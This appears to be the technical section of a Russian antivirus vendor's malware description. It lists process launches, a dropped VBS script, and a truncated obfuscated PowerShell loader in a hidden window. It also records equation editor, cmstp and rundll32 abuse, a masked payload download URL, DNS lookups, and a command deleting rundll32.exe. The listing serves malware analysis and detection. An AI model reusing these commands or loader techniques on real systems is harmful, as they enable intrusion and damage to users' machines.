Техническая информация
- '%WINDIR%\syswow64\cscript.exe' %TEMP%\codedg8.vbs AC
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\codedg8.vbs AC
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $F51F6E7DA288946E5001E9501E7A1F51CCF44443887D8A5547E7BF46F461F537B2DA3A396F536F=@(40,36,97,32,61,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,...
- %WINDIR%\explorer.exe
- iexplore.exe
- Процесс firefox.exe, модуль nss3.dll
- %WINDIR%\syswow64\autoconv.exe
- %TEMP%\codedg8.vbs
- http://pr#####luciones.com.mx/img/s/new.mp3
- DNS ASK pr#####luciones.com.mx
- DNS ASK vu#####.beta.webenza.in
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\codedg8.vbs AC' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $F51F6E7DA288946E5001E9501E7A1F51CCF44443887D8A5547E7BF46F461F537B2DA3A396F536F=@(40,36,97,32,61,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\svchost.exe' -k DcomLaunch -p -s PlugPlay
- '%WINDIR%\syswow64\cmd.exe' /c sc query wcncsvc >> AC
- '%WINDIR%\syswow64\rundll32.exe'
- '%WINDIR%\syswow64\cmstp.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\syswow64\rundll32.exe"